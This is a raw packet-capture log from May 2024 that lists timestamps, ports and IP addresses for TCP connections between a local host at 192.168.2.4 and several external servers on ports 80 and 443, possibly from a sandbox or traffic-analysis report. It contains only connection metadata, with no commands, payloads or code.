May 25, 2024 21:29:45.211201906 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:45.211230993 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:45.211639881 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:45.244757891 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:45.244786024 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:45.290709972 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.290879011 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.292639971 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.292714119 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.302105904 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.302160978 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.446660042 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.447036028 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.448729038 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.448973894 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.453568935 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.453604937 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.453727007 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.453727007 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.458331108 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.458364010 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.458384037 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.458457947 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.500643969 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.506005049 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.603466034 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.603538990 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.605129004 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.605256081 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.609097004 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.609131098 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.609189987 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.609189987 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.613202095 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.613234997 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.613255978 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.613282919 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.658682108 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.658742905 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.660155058 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.660206079 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.664108992 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.664156914 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.761059999 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.761141062 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.762124062 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.762181997 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.764724970 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.764775991 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.767407894 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.767441988 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.767492056 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.767513990 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.813000917 CEST	80	49761	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.813333988 CEST	49761	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.819052935 CEST	80	49761	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.819091082 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.819127083 CEST	49761	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.819148064 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.820137978 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.820297956 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.821595907 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.821655989 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.823362112 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.823815107 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.825089931 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.825150013 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.826870918 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.826903105 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.826961994 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.826983929 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.831648111 CEST	80	49761	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.871485949 CEST	49763	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.887933969 CEST	80	49763	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.888133049 CEST	49763	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.888232946 CEST	49763	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.888266087 CEST	49763	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.917376041 CEST	80	49763	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.917395115 CEST	80	49763	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.917408943 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.917465925 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.918101072 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.918154001 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.919435024 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.919452906 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.919534922 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.920797110 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.920870066 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.922147989 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.922163963 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.922198057 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.922220945 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.928890944 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:45.929027081 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:45.977060080 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.977128029 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.977930069 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.977983952 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.982036114 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.982050896 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.982086897 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:45.982121944 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.000698090 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.000710964 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.001719952 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.001945019 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.002796888 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.027936935 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.028014898 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.046500921 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.130714893 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.130808115 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.131799936 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.131995916 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.132587910 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.132810116 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.134243965 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.134314060 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.135544062 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.135658026 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.137372971 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.137409925 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.137430906 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.137455940 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.140300989 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.140377998 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.141282082 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.141315937 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.141345978 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.141349077 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.141374111 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.141385078 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.143618107 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.143651009 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.143706083 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.145960093 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.145996094 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.146013975 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.146053076 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.149419069 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.149454117 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.149477005 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.149499893 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.286364079 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.286921978 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.288084984 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.288170099 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.290944099 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.290977955 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.291033983 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.291584969 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.291676998 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.292741060 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.292774916 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.292807102 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.292835951 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.292881012 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.295075893 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.295144081 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.295341969 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.295384884 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.297466040 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.297499895 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.297517061 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.297554970 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.300039053 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.300072908 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.300106049 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.300127983 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.302541018 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.303236008 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.303389072 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.303421974 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.303445101 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.303468943 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.312164068 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.312705994 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.360137939 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.360217094 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.360518932 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.361953974 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.362039089 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.363444090 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.363503933 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.365135908 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.366000891 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.366460085 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.366476059 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.366508961 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.366530895 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.443227053 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.443806887 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.443916082 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.445291996 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.446095943 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.446782112 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.446816921 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.446840048 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.446865082 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.448311090 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.449980974 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.450001955 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.450028896 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.451272964 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.451307058 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.451324940 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.451339960 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.451353073 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.451385021 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.454277992 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.454354048 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.454432964 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.457241058 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.457273960 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.457328081 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.462698936 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.462732077 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.462793112 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.463141918 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.463174105 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.463205099 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.463226080 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.463251114 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.466743946 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.466794968 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.466813087 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.466828108 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.466842890 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.466861010 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.466875076 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.467225075 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.468590975 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.468657017 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.469533920 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.469567060 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.469602108 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.469630003 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.471389055 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.471785069 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.472309113 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.472377062 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.473261118 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.473293066 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.473325014 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.473361015 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.474232912 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.474266052 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.474287987 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.474307060 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.478128910 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.478161097 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.478216887 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.492196083 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.492260933 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.492343903 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.492343903 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.492360115 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.492432117 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.494138956 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.494170904 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.494254112 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.497047901 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.497128010 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.585282087 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.585357904 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.585752010 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.585752010 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.585768938 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.585968018 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.593780041 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.593967915 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.598539114 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.598684072 CEST	443	49762	104.102.42.29	192.168.2.4
May 25, 2024 21:29:46.598942041 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.598942041 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.599416018 CEST	49762	443	192.168.2.4	104.102.42.29
May 25, 2024 21:29:46.599560976 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.599627018 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.600003004 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.600424051 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.600620985 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.600652933 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.600707054 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.601387024 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.601995945 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.605746031 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.605796099 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.605807066 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.605828047 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.605846882 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.605860949 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.605875969 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.605890989 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.605925083 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.605927944 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.605957031 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.605981112 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.606188059 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.606245041 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.606581926 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.606616020 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.606642008 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.606667042 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.607678890 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.607713938 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.607739925 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.607745886 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.607781887 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.607804060 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.608870983 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.608958960 CEST	80	49763	158.160.165.129	192.168.2.4
May 25, 2024 21:29:46.608989000 CEST	80	49763	158.160.165.129	192.168.2.4
May 25, 2024 21:29:46.609000921 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.609110117 CEST	49763	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:46.610151052 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.610184908 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.610215902 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.610219955 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.610244989 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.610277891 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.611279011 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.611742020 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.611802101 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.612277985 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.612935066 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.613014936 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.613477945 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.613528013 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.614084005 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.614116907 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.614171028 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.615355968 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.615854979 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.615910053 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.616322041 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.616875887 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.616909027 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.616930008 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.616961002 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.617315054 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.617779970 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.617835999 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.622266054 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.622682095 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.646230936 CEST	49763	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:46.651422024 CEST	49764	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:46.680282116 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:46.680362940 CEST	443	49765	65.109.242.59	192.168.2.4
